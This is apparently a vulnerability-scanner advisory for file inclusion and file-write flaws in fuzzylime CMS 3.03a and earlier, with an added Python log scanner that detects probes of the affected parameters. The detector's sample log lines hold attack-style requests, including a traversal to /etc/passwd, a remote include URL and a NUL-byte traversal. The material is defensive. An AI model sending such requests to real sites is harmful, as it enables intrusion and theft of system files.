Summary
This host is installed with fuzzylime (cms), which is prone to a remote code execution vulnerability.
Impact
Successful exploitation will allow an attacker to include and execute arbitrary files from local and external resources, and to gain sensitive information about directories on the remote system when magic_quotes_gpc is disabled.
Impact level: Application/System
Solution
Upgrade to fuzzylime 3.03b or later.
For updates refer to http://cms.fuzzylime.co.uk/st/content/download
Insight
The flaws are due to:
- Data passed to the 'list' parameter in code/confirm.php and to the 'template' parameter in code/display.php is not properly verified before being used to include files.
- Input passed to the 's' parameter in code/display.php is not properly verified before being used to write to a file.
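A defender-side check for the two endpoints named above, added here as an example (it is not part of the advisory and not fuzzylime code): it scans Common Log Format access-log lines for requests to code/confirm.php and code/display.php whose 'list', 'template' or 's' values carry a traversal sequence, a URL scheme or a NUL byte. The log lines are constructed samples, and the log format and detection patterns are assumptions of this example, not anything the advisory specifies.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints and parameters named in the advisory (fuzzylime (cms) 3.03a and prior).
WATCHED = {"code/confirm.php": {"list"}, "code/display.php": {"template", "s"}}

# Values that must never reach include() or a file write: directory traversal,
# a URL scheme (remote include) or a NUL byte (path truncation with magic_quotes_gpc off).
SUSPICIOUS = re.compile(r"\.\./|\.\.\\|^[a-z][a-z0-9+.-]*://|\x00", re.IGNORECASE)

# Common Log Format (assumed); only the fields used below are captured.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def check_target(target):
    """Return [(endpoint, param, decoded_value)] for one request target."""
    parts = urlsplit(target)
    findings = []
    for endpoint, params in WATCHED.items():
        if not parts.path.endswith("/" + endpoint):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)  # first percent-decode
        for param in params:
            for raw in query.get(param, []):
                value = unquote(raw)  # second decode catches double-encoded input
                if SUSPICIOUS.search(value):
                    findings.append((endpoint, param, value))
    return findings

def scan_log(lines):
    """Return one dict per suspicious request found in Common Log Format lines."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for endpoint, param, value in check_target(m.group("target")):
            hits.append({"ip": m.group("ip"), "endpoint": endpoint, "param": param,
                         "value": value, "status": m.group("status")})
    return hits

# Constructed sample log lines (not real traffic); addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Mar/2017:10:00:00 +0000] "GET /code/display.php?template=../../../../etc/passwd HTTP/1.1" 200 512',
    '203.0.113.5 - - [28/Mar/2017:10:00:01 +0000] "GET /code/confirm.php?list=http://203.0.113.9/f.txt HTTP/1.1" 200 201',
    '198.51.100.7 - - [28/Mar/2017:10:00:02 +0000] "GET /code/display.php?template=news&s=home HTTP/1.1" 200 4096',
    '203.0.113.5 - - [28/Mar/2017:10:00:03 +0000] "GET /code/display.php?s=..%2F..%2Fdata%00 HTTP/1.1" 200 10',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first, second and fourth lines and leaves the benign third line alone; an upgrade to 3.03b remains the fix, the check only tells you whether the old endpoints were being probed.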
Affected
fuzzylime (cms) version 3.03a and prior.
References
Updated on 2017-03-28
Severity
Classification
CVE: CVE-2009-2176, CVE-2009-2177
CVSS Base Score: 7.5
CVSS Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P